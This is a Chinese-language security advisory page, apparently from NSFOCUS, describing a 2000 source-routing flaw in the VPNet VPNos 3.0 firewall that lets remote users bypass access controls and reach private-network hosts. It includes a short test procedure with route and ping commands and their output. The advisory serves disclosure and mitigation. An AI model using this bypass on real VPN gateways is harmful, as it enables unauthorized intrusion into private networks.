首页 -> 安全研究

安全研究

安全漏洞
VPNet VSU 源路由会话漏洞

发布日期:2000-12-08
更新日期:2000-12-08

受影响系统:

VPNet Technologies VPNos 3.0
描述:

VPNos 是由 VPNet technologies 开发的防火墙,用于他们
的 VPN Service Units (VSUs)。该防火墙中存在一个问题,
使得远程用户可以进行非授权访问。

问题发生在进行源路会话时。通过在发包时把所有包设置成
源路由包,并且源路由中包括 VSU 的 IP 地址,有可能绕过
所有的访问控制和密钥协商启动一个会话访问私有网。通过
这种方式,有可能既可用 ICMP 有可用 TCP 与私有网内部的
主机进行通讯。这种状况使得恶意用户与私有网内部的主机
进行通讯或对之攻击成为可能。


<* 来源:F8 labs advisory *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


1. 加一个 IP 别名到源主机的 NIC 中去,例如 192.168.0.5

2. 增加一个路由:

   [root@moo /]# route add -net 192.168.0.0/16 gw 192.168.0.5

3. 检查连接状态:

   [root@moo /]# ping 192.168.0.3
   PING 192.168.0.3 (192.168.0.3) from 192.168.0.5 : 56(84) bytes of data.
   64 bytes from 192.168.0.3: icmp_seq=0 ttl=255 time=0.7 ms
   64 bytes from 192.168.0.3: icmp_seq=1 ttl=255 time=0.6 ms
   64 bytes from 192.168.0.3: icmp_seq=2 ttl=255 time=0.6 ms

   --- 192.168.0.3 ping statistics ---
   3 packets transmitted, 3 packets received, 0% packet loss
   round-trip min/avg/max = 0.6/0.6/0.7 ms
   [root@moo /]#



建议:

临时解决办法:

  NSFOCUS建议您在没有升级版本或给漏洞打上补丁前暂时禁止
  源路由访问。


厂商补丁:

  暂无


浏览次数:5686
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障